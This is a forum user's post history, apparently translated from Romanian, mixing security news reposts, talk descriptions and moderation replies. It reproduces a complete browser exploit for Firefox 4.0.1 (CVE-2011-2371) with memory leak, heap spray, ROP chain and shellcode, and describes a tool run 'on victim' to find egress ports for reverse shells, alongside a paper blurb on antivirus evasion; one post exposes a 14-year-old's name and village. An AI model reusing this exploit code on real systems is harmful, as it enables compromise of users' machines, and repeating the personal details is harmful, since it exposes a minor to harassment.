Everything posted by Nytro
-
It's written with one's feet, a pile of junk, not exactly a source you can learn anything from. PS: Linux on 64 bits?
-
Also tell us what the differences are between "union" and "union all", between "into outfile" and "into dumpfile", how you check privileges, what you do if the directory isn't writable or you don't have the direct path, why that "+" is at the end and what it means for the browser, why you use hex for Load File when the PHP code shows that quotes aren't escaped, what can be done if the system function is in the "disabled_functions" list and... why do you use Internet Explorer?
-
How lame
-
BackTrack 5 R2 Released! Mar 1st, 2012
Nytro replied to co4ie's topic in Operating systems and hardware discussions
BackTrack 5 R2 Released
-
1. Remote Desktop Protocol - Wikipedia, the free encyclopedia
2. See the link from step 1; the question is irrational, RDP is a protocol
3. Simple Mail Transfer Protocol - Wikipedia, the free encyclopedia
4. I think you mean an SMTP server, a server that implements the SMTP PROTOCOL
5. You can send emails
PS: I answered your questions; for those who do this kind of thing, these terms have other connotations. Don't expect relevant answers from those people; I could swear there aren't 2-3 people here who have read about the SMTP or RDP protocol, they just use some crappy programs, they don't understand how the protocol itself works. It's like walking into an apartment block and trying a few keys on certain doors: it doesn't matter that you don't know how that door works, you just try, and if you're lucky you can brag (though there's nothing to brag about) that you're a "hacker" and that you've broken into servers (I say this because the same principles apply to SSH, which yes, is also a protocol).
NB: Communications protocol - Wikipedia, the free encyclopedia
Be one of those people who knows how a door's lock works, if you really want to be a... "door opener".
-
[h=1]Loophole in iOS Allows Developers Access to Users’ Photos[/h]
February 29, 2012, 2:29PM by Christopher Brook

A recently discovered hole in Apple's iOS allows third-party developers access to users’ iPhone, iPad or iPod Touch photos by exploiting the device’s location data, according to a report from the New York Times’ Nick Bilton on the Bits blog yesterday.

The loophole lies in the way that applications use certain photo location data. Assuming an iPhone user approves any app that accesses the location data of photos, the app’s developers will be able to capture any of the user’s images while that app is open. The Times had an unnamed developer create a proof-of-concept application to do just this, according to the blog post. The app, called PhotoSpy, was never submitted to the App Store for approval but asked users for access to location data. After granting it, the app began transferring photos and location data from the phone to a remote server.

Apple first allowed apps access to photo libraries in 2010 with the fourth build of their operating system. The move was intended to allow photo apps better access to let users share and edit photos.

While Apple didn't immediately respond to a request for comment on Wednesday, they have gone on record regarding any apps that may use a user's contact information without notification: “Apps that collect or transmit a user’s contact data without their prior permission are in violation of our guidelines,” Apple's Tom Neumayr told the Wall Street Journal's AllThingsD blog earlier this month.

The news comes two weeks after it was discovered that Twitter and other apps were uploading users’ contact lists to remote servers without their knowing. Path, a social network that encourages users to share photos and message each other, was criticized earlier this month after a researcher found the company’s app uploading users’ address books to the company without notification.

Source: Loophole in iOS Allows Developers Access to Users’ Photos | threatpost
-
A walk through the expo at RSA Conference 2012, part two
Posted on 29 February 2012.

The expo floor at this year's RSA Conference is bigger than ever, with numerous companies exhibiting for the first time. Here's another look at the show floor, with more interesting booths. For up-to-date conference news and photos check out our dedicated coverage page for RSA Conference 2012.

Photo captions:
- The extensive EMC booth dominates one of the rows.
- Sensage in the middle of a discussion.
- Presentation in progress at the Wave Safend booth.
- The Tenable Security space.
- FireHost briefing potential customers.
- The busy Arbor Networks booth.
- Something grabbed this gentleman's attention.
- The Check Point booth.

Source: A walk through the expo at RSA Conference 2012, part two
-
[h=1]Roboscan Internet Security – Free security suite with a dual engine: BitDefender and Tera[/h]
By Radu FaraVirusi(com) on February 29, 2012

A new free security suite is appearing on the market: Roboscan Internet Security Free. As for the Antivirus component, it uses two engines: BitDefender and Tera. Thus you can have top protection against malware of any kind, alongside a decent firewall. At first impression it has a very low resource consumption, 18 MB of RAM, and detection is very good. It is thus a serious competitor for the other free security products already on the market. Below are a few screenshots, followed by the download link.

To download it, go to: Roboscan

Source: Roboscan Internet Security – Suita de securitate gratuita cu motor dual: BitDefender si Tera
-
[h=4]Hitb2011Kul - Mobile Malware Analysis[/h]
Description: Mobile Malware Analysis
Source: Hitb2011Kul - Mobile Malware Analysis
-
[h=4]Hitb2011Kul - Reverse Engineering Android Malware[/h]
Description: Reverse Engineering Android Malware

Android is growing at an explosive rate, and users are storing an increasing amount of important data on their mobile phones, so the platform is an attractive target for malware authors. Malware authors are aiming at users of Google's Android mobile operating system with malicious applications that harvest personal information, take control of the system and send the data to a remote server. By using SMS toll fraud, malware authors also steal money from infected mobile phones. Malware infection on the Android platform is going to be interesting in the future (it's happening now!). Thus, reversing Android malware (Droid-ware) is an interesting challenge to address.

Malware analysis can be performed using two approaches: Dynamic Analysis and Dead-Listing Analysis (Reverse Engineering). Reverse engineering is a vitally important skill for today's expert security professional. In this presentation, we'll focus on the latter approach to analyze Android malware. In this talk, the speaker will discuss recent progress in the Android malware scene and provide details on a few recent Android malware samples. The speaker will also discuss the technical analysis of malicious Android applications using a reverse engineering approach. The analysis parts will focus on dissecting obfuscation such as encryption, string optimizing and generic obfuscation techniques applied inside Android malware. The challenges of reversing Android malware will be addressed as well.

About Mahmud Ab Rahman

Mahmud Ab Rahman currently works as an Information Security Specialist for the Malaysia Computer Emergency and Response Team (MyCERT) under the umbrella of CyberSecurity Malaysia. Prior to that, he worked as an Intrusion Analyst in the MyCERT department. His educational background comprises a Master's Degree in Computer Science from the National University of Malaysia in 2006. Prior to that, he obtained a Degree in Computer Science from the same university. Mahmud has been involved in the computer security field for over 5 years. His areas of focus and interest are network security, honeynets, botnet monitoring, and malware analysis. He also engages in several large-scale penetration-testing exercises and provides solutions for any vulnerabilities detected. Moreover, he is recognized for conducting a number of trainings for organizations on topics ranging from introductory to advanced security courses. He is an occasional speaker at conferences such as FIRST AGM, FIRST TC, Honeynet Annual Workshop and Infosec.MY. He is currently certified for SANS's GPEN (gold) and GREM.

Source: Hitb2011Kul - Reverse Engineering Android Malware
-
[h=1]First beta for GNOME 3.4[/h]
27 February 2012, 12:19

The GNOME project has released the first beta of GNOME 3.4, officially labelled GNOME 3.3.90 beta. This marks the development of the desktop environment moving into the home stretch and there should be no major changes from this point on because, among other things, the feature freeze was put in place a week ago.

The first beta implements a range of improvements to the core components and applications that make up the GNOME desktop. For example, the updated version of NetworkManager includes basic support for VLANs and bonded network ports. The GNOME shell and screensaver now use systemd to obtain information on active users of the system and their input devices rather than, as at present, using ConsoleKit. The previously developed Redo function in Nautilus, the streamlined web browser, and the new virtualisation and remote desktop software, GNOME Boxes, are also part of the beta.

According to the schedule, GNOME 3.4 is scheduled for release on 28 March. Before then, another beta and a release candidate will appear. (djwm)

Source: First beta for GNOME 3.4 - The H Open Source: News and Features
-
[h=2]New tool release – “Egress Buster” – Find outbound ports[/h]
February 29th, 2012

A friend was recently on a penetration test and needed a port on the outside. I haven’t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that, so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I’ll probably go back and clean it up sometime. There are some limitations; for one, operating systems in general start to puke when you generate over 1000 listeners, so you will need to test 1000 at a time. Good news is the socket handlers are multi-threaded, so you can cycle through about 1000 ports in well under a minute.

Here’s the general concept: You are on the inside network somehow and need to find what ports are allowed out to the Internet. There are two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet-facing computer that’s running egress_listener.

Very simple to run:

On victim: egressbuster.exe
example: egressbuster.exe 208.1.1.1 1-1000

In the above example, we specify a low port range and high port range; egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is.

The listener: python egress_listener.py
example: python egress_listener.py 1-1000

In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side.

192.168.235.131 connected on port: 170
192.168.235.131 connected on port: 171
192.168.235.131 connected on port: 172
192.168.235.131 connected on port: 173
192.168.235.131 connected on port: 174
192.168.235.131 connected on port: 175
192.168.235.131 connected on port: 176
192.168.235.131 connected on port: 177
192.168.235.131 connected on port: 178

If you're interested, download the byte-compiled code and the python source here.
Download: https://www.secmaniac.com/files/egressbuster.zip
Source: https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/
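The defender-side counterpart, added here as an example and not part of the Egress Buster tool or the original post: a small Python checker that groups outbound connection records by source and destination and flags the trace a port-range walk leaves behind (many distinct destination ports, long consecutive runs), so an egress test like the one above stands out in firewall or listener logs. The two log formats and the sample lines are constructed for the example.

```python
"""Flag egress-busting style outbound port sweeps in connection logs.

Added example (not from the Egress Buster project). It assumes two constructed
log formats:
  1) listener style:  "192.168.235.131 connected on port: 170"
  2) firewall style:  "ALLOW src=10.0.0.5 dst=203.0.113.9 dport=443"
"""
import re
from collections import defaultdict

LISTENER_RE = re.compile(r"^(?P<src>\d+\.\d+\.\d+\.\d+) connected on port: (?P<port>\d+)$")
FIREWALL_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<port>\d+)")


def parse_line(line):
    """Return (src, dst, port) or None. Listener-style lines carry no dst,
    so the listener itself is recorded as the destination."""
    m = LISTENER_RE.match(line.strip())
    if m:
        return m.group("src"), "listener", int(m.group("port"))
    m = FIREWALL_RE.search(line)
    if m:
        return m.group("src"), m.group("dst"), int(m.group("port"))
    return None


def longest_consecutive_run(ports):
    """Length of the longest run of consecutive port numbers in a set."""
    best = 0
    for p in ports:
        if p - 1 in ports:          # only count from the lowest port of a run
            continue
        length = 1
        while p + length in ports:
            length += 1
        best = max(best, length)
    return best


def find_port_sweeps(lines, min_distinct_ports=20, min_consecutive=10):
    """Group connections by (src, dst) and flag pairs that hit many distinct
    destination ports or a long consecutive range: the signature of a tool
    walking a port range rather than of ordinary client traffic."""
    ports_by_pair = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            src, dst, port = parsed
            ports_by_pair[(src, dst)].add(port)
    findings = []
    for (src, dst), ports in ports_by_pair.items():
        run = longest_consecutive_run(ports)
        if len(ports) >= min_distinct_ports or run >= min_consecutive:
            findings.append({"src": src, "dst": dst,
                             "distinct_ports": len(ports), "longest_run": run})
    return findings


# Constructed sample: one host walking ports 1..30 against an external address,
# plus a normal host that only talks to 80 and 443.
SAMPLE_LOG = [f"ALLOW src=10.0.0.5 dst=203.0.113.9 dport={p}" for p in range(1, 31)]
SAMPLE_LOG += ["ALLOW src=10.0.0.7 dst=198.51.100.4 dport=443",
               "ALLOW src=10.0.0.7 dst=198.51.100.4 dport=80"]

if __name__ == "__main__":
    for f in find_port_sweeps(SAMPLE_LOG):
        print(f"port sweep: {f['src']} -> {f['dst']} "
              f"({f['distinct_ports']} ports, longest run {f['longest_run']})")
```

The thresholds are starting points; on a real perimeter, feed it the firewall's allowed-outbound log and tune them to the noise level of your network.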
-
Metasploit - Low Level View
Saad Talaat (saadtalaat _ gmail.com)

Foreword

Abstract: For the past decade (almost) Metasploit has been the number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key point of this paper is to discuss the Metasploit framework as a code injector and payload encoder. Another key point of this paper is the different forms of malware and how to avoid anti-viruses, which have been a pain for pentesters lately, and how exactly anti-malware software works.

Introduction

Evading anti-viruses has been a painful issue for pentesters for years. On the other hand, the birth of an anti-virus evading technique means blackhats and skiddies will have another way to hack without being detected. Over the years the Metasploit framework has relied on one technique for evading anti-viruses, which is encoding. For a year or two some encoding techniques worked fine. Nowadays it's nearly impossible to get an encoded payload from Metasploit's encoders that evades anti-virus, no matter how many iterations you do.

Download: [URL]http://cdn01.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf[/URL]
-
Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit

<!--
Full Exploit Code: http://www.exploit-db.com/sploits/18531.zip

PoC exploit for CVE-2011-2371
tested against Firefox 4.0.1
md5 of mozjs.dll: 5d7ffcc9deb5bb08417ceae51d2afed4
change constants to switch between w7/xp.

see my blog if you want to know how this works.
http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/

p_k
twitter.com/pa_kt
gdtr.wordpress.com
-->
<html>
<script src="jspack.js"></script>
<script>

function hex(x){
    var y = x.toString(16);
    y = "0x"+y;
    return y;
}

function itoa(i) {
    return String.fromCharCode(i);
}

// n - length in bytes (1 unicode char = 2 bytes)
function puff(x, n){
    while(x.length < n) x += x;
    return x.substring(0,n);
}

function arr2hex(tab){
    var s = "";
    for(var i in tab){
        x = tab[i];
        x = x.toString(16);
        if(x.length<2) x = "0"+x;
        s += x + " ";
    }
    return s;
}

function arr2ascii(tab){
    var s = ""
    for(var i in tab){
        x = tab[i];
        if(0x20 <= x && x<=0x7f){
            y = itoa(x);
        }
        else{
            y = ".";
        }
        s += y;
    }
    return s;
}

function xchg(d,i,j){
    t = d[i];
    d[i] = d[j];
    d[j] = t;
}

function bswap(d){
    xchg(d, 0, 3);
    xchg(d, 1, 2);
}

function nicer(tab){
    jsp = new JSPack();
    res = [];
    for(var i in tab){
        x = tab[i];
        t = jsp.Pack("d", [x]);
        d1 = t.slice(0, 4);
        d2 = t.slice(4, 8);
        bswap(d1);
        bswap(d2);
        t = [d1,d2];
        res = res.concat(t);
    }
    res = res.reverse();
    return res;
}

function dw2int(d){
    n = 0;
    for(var i=0;i<4;i++){
        n *= 256;
        n += d[3-i];
    }
    return n;
}

function convert(tab){
    o = s = v = "";
    for(var i in tab){
        d = tab[i];
        s += arr2hex(d);
        v += arr2ascii(d);
        if((parseInt(i)+1)%4==0){
            o += s + " | " + v + "\n";
            s = "";
            v = "";
        }
    }
    return o;
}

function check_pair(d1, d2){
    var n1 = dw2int(d1);
    var n2 = dw2int(d2);
    if(n2-n1 == 0x304) return true;
    return false;
}

function find_mozjs_base(tab){
    var n1 = 0;
    for(var i=0;i<tab.length-4;i++){
        d1 = tab[i];
        d2 = tab[i+1];
        if(check_pair(d1,d2)){
            n1 = dw2int(d1);
            n1 = n1 - 0x3cac; //n1 = mozjs .data
            n1 = n1 - 0x1B2000; //n1 = mozjs base
            break;
        }
    }
    return n1;
}

function d2u(dword){
    var uni = String.fromCharCode(dword & 0xFFFF);
    uni += String.fromCharCode(dword>>16);
    return uni;
}

function odd_d2u(d1, d2){
    uni = String.fromCharCode((d1&0xFF)<<8);
    uni += String.fromCharCode((d1>>8)&0xFFFF);
    uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)<<8)); //1+1<<8 == 512 in JS T_T
    uni += String.fromCharCode((d2>>8)&0xFFFF);
    uni += String.fromCharCode(d2>>24);
    return uni;
}

// generated with mona.py
function rop_chain(mozjs_base){
    var arr = [
        mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll]
        mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll]
        mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll]
        mozjs_base + 0x0014293c, // XCHG EAX,ESI // RETN [mozjs.dll]
        mozjs_base + 0x0014d00d, // POP EBP // RETN [mozjs.dll]
        mozjs_base + 0x000d7ee2, // & push esp // ret 04 [mozjs.dll]
        mozjs_base + 0x000be327, // POP EBX // RETN [mozjs.dll]
        0x00000001, // 0x00000001-> ebx
        mozjs_base + 0x0004f422, // POP EDX // RETN [mozjs.dll]
        0x00001000, // 0x00001000-> edx
        mozjs_base + 0x000b1421, // POP ECX // RETN [mozjs.dll]
        0x00000040, // 0x00000040-> ecx
        mozjs_base + 0x000062e3, // POP EDI // RETN [mozjs.dll]
        mozjs_base + 0x0000f005, // RETN (ROP NOP) [mozjs.dll]
        mozjs_base + 0x000652f0, // POP EAX // RETN [mozjs.dll]
        0x90909090, // nop
        mozjs_base + 0x001372bd // PUSHAD // RETN [mozjs.dll]
    ];
    return arr;
}

function tab2uni(tab){
    var uni = ""
    for(var i=0;i<tab.length;i++){
        uni += d2u(tab[i]);
    }
    return uni;
}

function spray(mozjs_base, h1_s, hsize) {
    function rva2va(addr) {
        return addr+mozjs_base;
    }
    function rva2d(addr) {
        return d2u(rva2va(addr));
    }

    var align = 0x100000;
    var tab_offset = 0x1000;
    var TYPE_OBJECT = "%u0007%uffff";

    var pivot_rva = 0x1a21c; // 0x68e7a21c : # ADD EBP,EBX # PUSH DS # POP EDI # POP ESI # POP EBX # MOV ESP,EBP # POP EBP # RETN
    var mov_esp_ebp_rva = 0x1a222; // mov esp, ebp # pop ebp # ret

    var h2_s = h1_s + hsize;
    var h2_middle = (h2_s + hsize/2) & (~(align-1)); //align
    //mov eax,dword ptr [edi+64h] ;edi=[h2_ptr+4], later: call eax
    var h2_ptr = h2_middle + tab_offset;
    var off1 = h2_ptr;
    var off2 = h2_ptr-0x64;

    var v1 = d2u(off1);
    var h1_fill = unescape(v1+TYPE_OBJECT);
    var foo = puff(h1_fill, 0x4000);
    var h1_spray = foo.substring(0,(0x4000/2)-2);

    var pivot_va = rva2va(pivot_rva);
    pivot_va = d2u(pivot_va);
    off2 = d2u(off2);

    var new_ebp = h2_ptr+18;
    var mov_esp_ebp_va = rva2va(mov_esp_ebp_rva);
    var set_esp = odd_d2u(new_ebp, mov_esp_ebp_va);

    var rop = tab2uni(rop_chain(mozjs_base));

    //shellcode by skylined
    var msgbox_shellcode = "%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%ue367%u8bec%u207b%uef01%u7c8b%ufc8f%uef01%uc031%u3299%u6617%ucac1%uae01%uf775%u8166%u2afa%u74b6%u6609%ufa81%u1aaa%udbe0%uc575%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u8597%u74f6%u6812%u3233%u2020%u7568%u6573%u5472%ud5ff%u3195%uebf6%u56a3%u3168%u0021%u6800%u322d%u3733%u3268%u3130%u6831%u7663%u2d65%u8754%u2404%u5050%uff56%uccd5";

    var x = unescape(pivot_va+off2+set_esp+"%u1111%u2222"+rop+msgbox_shellcode);
    x = puff(x, 0x4000);
    var h2_spray = x.substring(0,(0x4000/2)-2);

    var spray_tab = new Array();
    for (i=0;i<0x1000;i++){
        spray_tab[i] = h1_spray+"1";
        spray_tab[i].indexOf("zzz");
    }
    for (i=0x1000;i<0x2000;i++){
        spray_tab[i] = h2_spray+"2";
        spray_tab[i].indexOf("zzz");
    }
}

var exploit_func = function bleh(prev, current, index, array) {
    //boom = typeof current;
    current[4] = 1; // add ebp, ebx, where ebx=2*4+1=9
    //throw "up";
}

function trigger(func, arr_len){
    xyz.length = arr_len;
    try{
        xyz.reduceRight(func,1,2,3);
    }
    catch(e){
    }
}

function leak(){
    var CHUNK_SIZE = 0x1000;
    var leak_arr_len = 0xffffffff;
    mem = [];
    count = 0;

    var leak_func = function bleh(prev, current, index, array) {
        if(typeof current == "number"){
            mem.push(current);
        }
        count += 1;
        if(count>=CHUNK_SIZE/8){
            throw "lol";
        }
    }

    function dump_mem(leak_f, arr_len){
        var dump = document.getElementById("dump");
        var mozjs_base = 0;
        for(var i=0;;i++){
            mem = [];
            count = 0;
            trigger(leak_f, arr_len);
            mem = nicer(mem);
            s = convert(mem);
            dump.innerHTML = s;
            //alert("leaked bytes: "+hex(mem.length*4));
            mozjs_base = find_mozjs_base(mem);
            //alert("mozjs base: "+hex(mozjs_base));
            if(mozjs_base != 0){
                break;
            }
        }
        return mozjs_base;
    }

    var base = dump_mem(leak_func, leak_arr_len);
    return base;
}

function go(){
    //var arr_ptr = 0x05000000; //(xp sp3)
    //var h1_s = 0x05b00000;
    //var h2_e = 0x0fb00000;

    var arr_ptr = 0x0b000000; //w7
    var h1_s = 0x0b500000;
    var h2_e = 0x16e00000;

    var size = h2_e-h1_s;
    var hsize = size/2;
    var h1_middle = h1_s+hsize/2;

    var exp_arr_len = (h1_middle - arr_ptr)/8 + 0x80000000;

    var mozjs_base = leak();
    spray(mozjs_base, h1_s, hsize);
    alert("ready");
    while(1){
        trigger(exploit_func, exp_arr_len);
        exp_arr_len -= 0x500;
    }
}

// globals
var xyz = new Array();

</script>
<body>
<input type="button" value="go" onclick="go()" />
<pre id="dump">
</pre>
</body>
</html>

Source: Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit
-
Google offers one million dollars to hackers who break the Chrome browser
Nytro replied to seriks's topic in Security news
Those with the crash, let me see, how do you crash Chrome? Write an HTML page or some JavaScript code that crashes Chrome... -
Google offers one million dollars to hackers who break the Chrome browser
Nytro replied to seriks's topic in Security news
And apparently the European Parliament wants to stop these "attacks" in order TO PROTECT PROGRAMMERS' RIGHTS, while they offer a pile of money precisely to "violate" that right. Fuck parliamentarians everywhere. The chances of anyone succeeding at anything are very small. Only the VUPEN guys managed it, where there are truly "solid" people, people who earn those 60,000 dollars quickly and who might not even bother travelling for that amount. -
The ban won't be lifted no matter how many "friends" of yours from Messenger throw a tantrum. The moderators won't lift the ban because they'd be left without a moderator. And you, ban: multiple accounts are forbidden, and I'm sick of this fuss. If anyone else wakes up to comment, they're next on the banned list. If you don't like it, throw a tantrum.
-
I don't know who you are or why you posted here, I wasn't going to ban you, but it's RST not RTS, so "Goodbye".
-
EFF to European Parliament: Protect Coders’ Rights
Nytro replied to Fi8sVrs's topic in Security news
Fuck the European Parliament. If I think about Romania and what kind of parliamentarians it has, any words are useless... They're dumb as rocks. Practically, the "programmers" don't want these stupid laws, it's NOT for their good, it's yet another attempt at mass control. -
ID: mafteiliviu14, so his name is Maftei Liviu and he's 14 (I'm a genius, I know) and he's from Neamt, Urecheni commune. Why don't people from Bucharest do shit like this, so we could go visit them at home?
-
Thanks. I recommend it to everyone who has a good opinion of themselves, it's the perfect demonstration of what hacking means. PS: If you want the (printed) book, buy me a beer and I'll lend it to you.
-
There's no need for them to post, I just want them to read and realize that 13 years after this phenomenon appeared, self-styled "hackers" have started showing up just because they assume they understand this technique. I'll post some interesting articles tonight, so that people understand that on the SQLi front we're about 8 years behind...
-
I downloaded it too when I had nothing to do: Mirror: [URL]https://rstcenter.com/videos/Debugging/[/URL]
-
On Christmas day, 1998, Phrack 54 was issued. Phrack[1] is a “Hacker magazine written by the community, for the community”. It is an excellent source of technical security information and in this particular edition, 54, there was an article entitled “NT Web Technology Vulnerabilities” written by rfp – or rain forest puppy. Amongst other things this article described a number of attacks that employed SQL injection, though at no point is this term used in the article. rfp discusses IDC and ASP applications running on Microsoft’s Internet Information Server feeding into SQL Server 6.5. This article is the first real public outing of SQL injection – it just wasn’t called SQL injection at that time. That would come later.

Next of note was a security advisory published by Allaire[2] on February the 4th 1999, a little over a month after rfp’s article. The security bulletin discusses the threat posed by “Multiple SQL Statements in Dynamic Queries”.

Link: http://phrack.org/issues.html?issue=54&id=8#article

Read it, and don't forget it was written in 1998...